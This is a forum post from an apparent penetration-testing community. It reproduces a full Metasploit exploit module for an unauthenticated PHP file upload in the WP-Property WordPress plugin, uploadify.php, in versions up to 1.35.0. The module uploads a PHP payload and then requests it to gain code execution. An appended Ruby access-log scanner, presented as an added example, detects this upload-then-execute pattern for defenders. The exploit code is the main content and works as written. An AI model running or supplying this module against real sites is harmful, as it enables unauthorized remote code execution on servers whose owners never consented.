China Network Penetration Testing Alliance

Title: WordPress WP-Property PHP File Upload Vulnerability

Author: admin    Time: 2013-1-4 19:51
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # A 200 response only shows that uploadify.php is reachable;
  # it does not confirm the plugin version.
  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Multipart body: the file part ("Filedata") and the destination "folder" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The response body is expected to contain the path of the stored file
    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
Don't ask me what this code is or how to use it. I'm talking about msf.
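
The module above POSTs a file to uploadify.php and then requests the path returned in the response, which leaves a recognizable pair of entries in the web server's access log. The following Ruby scan is an added example, not part of the original post or of Metasploit: it flags a 200 POST to uploadify.php and any other .php file requested from the uploadify directory, noting whether the same client uploaded first. The combined log format, the helper names (`parse`, `scan`) and the sample log lines are assumptions constructed for the example.

```ruby
# Added example: find the WP-Property uploadify.php upload pattern in access logs.
# Assumes Apache/nginx "combined" log format; SAMPLE_LOG lines are constructed.
UPLOADIFY_DIR = %r{/wp-content/plugins/wp-property/third-party/uploadify/}
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

def parse(line)
  m = LOG_LINE.match(line)
  return nil unless m
  { ip: m[:ip], time: m[:time], method: m[:method],
    path: m[:path].split('?', 2).first, status: m[:status].to_i }
end

# Returns findings of two kinds:
#   :upload      - POST to uploadify.php answered with 200
#   :php_request - any other .php requested under the uploadify directory;
#                  :after_upload is true when the same client uploaded earlier
def scan(lines)
  uploaders = {}
  findings = []
  lines.each do |line|
    e = parse(line)
    next unless e && e[:path] =~ UPLOADIFY_DIR
    file = File.basename(e[:path])
    if file == 'uploadify.php'
      next unless e[:method] == 'POST' && e[:status] == 200
      uploaders[e[:ip]] = true
      findings << e.merge(kind: :upload)
    elsif file.downcase.end_with?('.php')
      findings << e.merge(kind: :php_request, after_upload: uploaders.key?(e[:ip]))
    end
  end
  findings
end

SAMPLE_LOG = [
  '198.51.100.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120',
  '203.0.113.9 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0',
  '203.0.113.9 - - [04/Jan/2013:19:41:12 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 83',
  '203.0.113.9 - - [04/Jan/2013:19:41:13 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/abcde.php HTTP/1.1" 200 0',
  '198.51.100.7 - - [04/Jan/2013:19:42:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 912',
  '198.51.100.7 - - [04/Jan/2013:19:43:30 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/check.php HTTP/1.1" 404 210'
].freeze

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_LOG).each { |f| puts f.values_at(:time, :ip, :kind, :after_upload, :path).join(' ') }
end
```

A `:php_request` finding with `after_upload` set is the strongest signal; on a site running WP-Property <= 1.35.0, any `:upload` finding warrants inspecting the uploadify directory for unexpected files.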